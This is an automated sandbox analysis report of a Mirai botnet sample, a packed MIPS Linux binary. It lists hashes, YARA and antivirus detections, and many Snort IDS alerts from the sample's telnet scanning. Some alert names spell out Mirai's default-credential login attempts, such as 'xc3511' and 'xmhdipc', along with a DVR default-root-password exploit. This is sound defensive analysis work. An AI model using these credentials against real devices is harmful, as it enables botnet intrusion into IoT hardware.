Loading ...

Play interactive tourEdit tour

Linux Analysis Report HCyigyiCAH

Overview

General Information

Sample Name:HCyigyiCAH
Analysis ID:509945
MD5:37d47c84691e35296d2eee47a3bb19c3
SHA1:afe47428ba503e1d48d58ca9e63dec079676af01
SHA256:be3c2bbc9ccb07afdb7d40068a1d4ab3911ba6e81eddc72d3e7251fbc09d5aff
Tags:32elfmipsmirai
Infos:

Most interesting Screenshot:

Detection

Mirai
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:509945
Start date:27.10.2021
Start time:07:51:17
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 15s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:HCyigyiCAH
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal72.troj.evad.lin@0/0@0/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100

Process Tree

  • system is lnxubuntu20
  • HCyigyiCAH (PID: 5287, Parent: 5119, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/HCyigyiCAH
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
HCyigyiCAHSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x7988:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x79f7:$s2: $Id: UPX
  • 0x79a8:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: HCyigyiCAHVirustotal: Detection: 20%Perma Link
    Source: HCyigyiCAHReversingLabs: Detection: 25%

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 213.100.207.63: -> 192.168.2.23:
    Source: TrafficSnort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:60982
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 213.113.96.66: -> 192.168.2.23:
    Source: TrafficSnort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:33016
    Source: TrafficSnort IDS: 2023433 ET TROJAN Possible Linux.Mirai Login Attempt (7ujMko0admin) 192.168.2.23:35248 -> 69.173.197.206:23
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 69.173.197.206:23 -> 192.168.2.23:35248
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 69.173.197.206:23 -> 192.168.2.23:35248
    Source: TrafficSnort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:33232
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:49020 -> 203.209.76.162:23
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 109.189.163.2: -> 192.168.2.23:
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47466
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 69.173.197.206:23 -> 192.168.2.23:35410
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 69.173.197.206:23 -> 192.168.2.23:35410
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 93.222.111.77:23 -> 192.168.2.23:49538
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 93.222.111.77:23 -> 192.168.2.23:49538
    Source: TrafficSnort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:33390
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47524
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47568
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47646
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47742
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 69.173.197.206:23 -> 192.168.2.23:35700
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 69.173.197.206:23 -> 192.168.2.23:35700
    Source: TrafficSnort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:33654
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47786
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 93.222.111.77:23 -> 192.168.2.23:49862
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 93.222.111.77:23 -> 192.168.2.23:49862
    Source: TrafficSnort IDS: 716 INFO TELNET access 177.135.122.105:23 -> 192.168.2.23:37510
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 37.44.205.214: -> 192.168.2.23:
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47874
    Source: TrafficSnort IDS: 2023333 ET TROJAN Linux.Mirai Login Attempt (xc3511) 192.168.2.23:42466 -> 77.60.19.209:23
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:42466 -> 77.60.19.209:23
    Source: TrafficSnort IDS: 2023450 ET TROJAN Possible Linux.Mirai Login Attempt (xmhdipc) 192.168.2.23:42494 -> 77.60.19.209:23
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47944
    Source: TrafficSnort IDS: 716 INFO TELNET access 218.4.210.150:23 -> 192.168.2.23:35130
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 69.173.197.206:23 -> 192.168.2.23:35922
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 69.173.197.206:23 -> 192.168.2.23:35922
    Source: TrafficSnort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:33854
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:47990
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 58.211.32.180:23 -> 192.168.2.23:48036
    Source: TrafficSnort IDS: 716 INFO TELNET access 177.135.122.105:23 -> 192.168.2.23:37700
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53080
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 93.222.111.77:23 -> 192.168.2.23:50164
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 93.222.111.77:23 -> 192.168.2.23:50164
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53080
    Source: TrafficSnort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47460
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53120
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 62.97.186.102: -> 192.168.2.23:
    Source: TrafficSnort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47486
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53120
    Source: TrafficSnort IDS: 716 INFO TELNET access 218.4.210.150:23 -> 192.168.2.23:35382
    Source: TrafficSnort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47510
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53168
    Source: TrafficSnort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47530
    Source: TrafficSnort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53832
    Source: TrafficSnort IDS: 716 INFO TELNET access 63.145.93.66:23 -> 192.168.2.23:34084
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53168
    Source: TrafficSnort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47544
    Source: TrafficSnort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53858
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53206
    Source: TrafficSnort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47578
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53206
    Source: TrafficSnort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53888
    Source: TrafficSnort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47596
    Source: TrafficSnort IDS: 716 INFO TELNET access 177.135.122.105:23 -> 192.168.2.23:37922
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53252
    Source: TrafficSnort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53916
    Source: TrafficSnort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47622
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53252
    Source: TrafficSnort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47638
    Source: TrafficSnort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53944
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53292
    Source: TrafficSnort IDS: 716 INFO TELNET access 125.125.24.0:23 -> 192.168.2.23:47652
    Source: TrafficSnort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53956
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:47652 -> 125.125.24.0:23
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 183.203.162.27:23 -> 192.168.2.23:53292
    Source: TrafficSnort IDS: 716 INFO TELNET access 61.127.32.65:23 -> 192.168.2.23:53972
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 93.222.111.77:23 -> 192.168.2.23:50420
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 93.222.111.77:23 -> 192.168.2.23:50420
    Source: TrafficSnort IDS: 716 INFO TELNET access 218.4.210.150:23 -> 192.168.2.23:35556
    Source: TrafficSnort IDS: 716 INFO TELNET access 183.203.162.27:23 -> 192.168.2.23:53320
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48002
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48030
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48034
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 47980
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48066
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48068
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48070
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48046
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48074
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48078
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48082
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48080
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48090
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48092
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48098
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48100
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48088
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48120
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 48152
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45110
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45112
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45132
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45132
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45140
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45160
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45168
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45170
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45174
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45194
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 45210
    Source: global trafficTCP traffic: 192.168.2.23:45976 -> 104.244.72.185:9902
    Source: /tmp/HCyigyiCAH (PID: 5287)Socket: 127.0.0.1::22292
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48654
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48652
    Source: unknownNetwork traffic detected: HTTP traffic on port 41494 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60690 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37760
    Source: unknownNetwork traffic detected: HTTP traffic on port 58810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 39374 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38610
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56038
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58464
    Source: unknownNetwork traffic detected: HTTP traffic on port 52232 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59314
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57378
    Source: unknownNetwork traffic detected: HTTP traffic on port 35974 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46228
    Source: unknownNetwork traffic detected: HTTP traffic on port 46460 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45138
    Source: unknownNetwork traffic detected: HTTP traffic on port 36772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48642
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44042
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46460
    Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35328
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58468
    Source: unknownNetwork traffic detected: HTTP traffic on port 45226 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36664
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35324
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35566
    Source: unknownNetwork traffic detected: HTTP traffic on port 33472 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51616 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60306
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59620 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44032
    Source: unknownNetwork traffic detected: HTTP traffic on port 54104 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38610 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 37686 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35316
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38830
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51600
    Source: unknownNetwork traffic detected: HTTP traffic on port 36324 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43388 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33142
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34474
    Source: unknownNetwork traffic detected: HTTP traffic on port 56376 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47534
    Source: unknownNetwork traffic detected: HTTP traffic on port 41848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44266
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47770
    Source: unknownNetwork traffic detected: HTTP traffic on port 44266 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51616
    Source: unknownNetwork traffic detected: HTTP traffic on port 47534 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36640
    Source: unknownNetwork traffic detected: HTTP traffic on port 41678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34456
    Source: unknownNetwork traffic detected: HTTP traffic on port 42808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34460
    Source: unknownNetwork traffic detected: HTTP traffic on port 35984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58250
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48858
    Source: unknownNetwork traffic detected: HTTP traffic on port 44198 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46656 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38654
    Source: unknownNetwork traffic detected: HTTP traffic on port 37216 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59470 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57570
    Source: unknownNetwork traffic detected: HTTP traffic on port 39512 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58580 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 45318 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50946
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55454 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 36084 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37554
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34038
    Source: unknownNetwork traffic detected: HTTP traffic on port 42600 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56248
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59522
    Source: unknownNetwork traffic detected: HTTP traffic on port 54572 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46622 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58430
    Source: unknownNetwork traffic detected: HTTP traffic on port 56444 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50952
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47588
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47586
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50954
    Source: unknownNetwork traffic detected: HTTP traffic on port 47714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40040 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44074
    Source: unknownNetwork traffic detected: HTTP traffic on port 40200 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53054 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60510
    Source: unknownNetwork traffic detected: HTTP traffic on port 56972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 41778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 41046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33180
    Source: unknownNetwork traffic detected: HTTP traffic on port 58156 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46004
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48422
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50968
    Source: unknownNetwork traffic detected: HTTP traffic on port 46380 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48422 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35346
    Source: unknownNetwork traffic detected: HTTP traffic on port 57884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 33746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59300
    Source: unknownNetwork traffic detected: HTTP traffic on port 48940 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34262
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59782
    Source: unknownNetwork traffic detected: HTTP traffic on port 36096 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51818
    Source: unknownNetwork traffic detected: HTTP traffic on port 45214 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 48996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47326
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49348
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52756
    Source: unknownNetwork traffic detected: HTTP traffic on port 37934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38450
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38452
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36274
    Source: unknownNetwork traffic detected: HTTP traffic on port 37212 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38458
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38448
    Source: unknownNetwork traffic detected: HTTP traffic on port 43850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 46778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34096
    Source: unknownNetwork traffic detected: HTTP traffic on port 52406 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52092 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38464 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54044 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53618
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38686
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51674
    Source: unknownNetwork traffic detected: HTTP traffic on port 46044 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38438
    Source: unknownNetwork traffic detected: HTTP traffic on port 43386 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34086
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59160
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34364 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57378 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34456 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48236
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38430
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36010
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38432
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47380
    Source: unknownNetwork traffic detected: HTTP traffic on port 52234 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 45572 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60154
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42922
    Source: unknownNetwork traffic detected: HTTP traffic on port 52276 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46044
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46042
    Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52540
    Source: unknownNetwork traffic detected: HTTP traffic on port 35970 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36486
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39512
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36238
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35396
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35154
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48218
    Source: unknownNetwork traffic detected: HTTP traffic on port 50478 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38488 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50776
    Source: unknownNetwork traffic detected: HTTP traffic on port 43780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 40854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 38654 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38490
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38492
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39584
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36078
    Source: unknownNetwork traffic detected: HTTP traffic on port 52978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 1872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57254 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 34386 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40320
    Source: unknownNetwork traffic detected: HTTP traffic on port 58846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40564
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51636
    Source: unknownNetwork traffic detected: HTTP traffic on port 39818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38482
    Source: unknownNetwork traffic detected: HTTP traffic on port 38686 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38488
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43828
    Source: unknownNetwork traffic detected: HTTP traffic on port 53278 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60342
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60582
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58034
    Source: unknownNetwork traffic detected: HTTP traffic on port 43092 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59364
    Source: unknownNetwork traffic detected: HTTP traffic on port 35852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 32898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60588
    Source: unknownNetwork traffic detected: HTTP traffic on port 46828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52978
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54914
    Source: unknownNetwork traffic detected: HTTP traffic on port 35396 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59378
    Source: unknownNetwork traffic detected: HTTP traffic on port 56160 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 47700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 35270 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59088 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49348 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53932 -> 443
